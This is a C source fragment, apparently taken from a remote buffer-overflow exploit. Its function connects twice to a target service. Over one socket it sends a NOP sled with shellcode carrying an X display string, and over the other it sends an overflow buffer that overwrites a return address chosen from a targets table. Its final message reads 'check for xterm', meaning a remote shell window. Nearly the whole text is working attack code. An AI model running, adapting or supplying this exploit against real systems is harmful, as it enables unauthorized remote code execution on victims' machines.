
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {unsigned int targret; unsigned int targsafe; int len; } ;


 int ARK_PORT ;
 int DATA_LEN ;
 int HEAD_LEN ;
 int NOP ;
 int NOP_LEN ;
 int close (int) ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 int isock (char*,int) ;
 scalar_t__ malloc (int) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int ,int) ;
 int ntohs (int) ;
 char* shellcode ;
 int sleep (int) ;
 int sprintf (char*,char*,char*,char*,char*) ;
 int stderr ;
 int strlen (char*) ;
 TYPE_1__* targets ;
 int write (int,char*,int) ;

int lin(char *host, char *export, unsigned int tnum)
{

 char head[] = "\x00\x4d\x00\x03\x00\x01\xff\xff";
 char data[DATA_LEN];
 char sc_req[NOP_LEN*2];
 char *sc;
 unsigned int retaddr;
 unsigned int safe;
 int datalen = 0;
 int port = ARK_PORT;
 int sock_overflow, sock_nops;
 int i;
 int nullmap = 0;

 sock_overflow = sock_nops = 0;

 retaddr = targets[tnum].targret;
 safe = targets[tnum].targsafe;
 datalen = targets[tnum].len;


 sock_nops = isock(host, port);

 if (sock_nops < 1)
  exit(-1);
 fprintf(stderr, "[*] Connected to %s:%d NOP+shellcode socket\n", host, port);

 sock_overflow = isock(host, port);
 if (sock_overflow < 1)
   exit(-1);
 fprintf(stderr, "[*] Connected to %s:%d overflow socket\n", host, port);


 memset(data, NOP, DATA_LEN);


 memcpy(data+datalen - 8, (char *)&retaddr, 4);

 memcpy(data+datalen-4, (char *)&safe, 4);

 datalen = ntohs(datalen);
 memcpy(head+6, (char *)&datalen, 2);


 memset(sc_req, NOP, NOP_LEN+1);
 sc = (char *)malloc(strlen(shellcode) + strlen(export) + 2);
 sprintf(sc, "%s%s%s", shellcode, export, "K");
 if (strlen(sc) + NOP_LEN > NOP_LEN*2-1)
 {
  fprintf(stderr, "[!] display name too long\n");
  exit(-1);
 }

 memcpy(sc_req+NOP_LEN, sc, strlen(sc));


 fprintf(stderr, "[*] Sending nops+shellcode\n");
 write(sock_nops, sc_req, NOP_LEN+strlen(sc)+1);
 fprintf(stderr, "[*] Done, sleeping\n");
 sleep(1);
 close(sock_nops);


 write(sock_overflow, head, HEAD_LEN);
 datalen = ntohs(datalen);
 fprintf(stderr, "[*] Sending overflow\n");
 write(sock_overflow, data, datalen);
 fprintf(stderr, "[*] Done, check for xterm\n");
 close(sock_overflow);

}
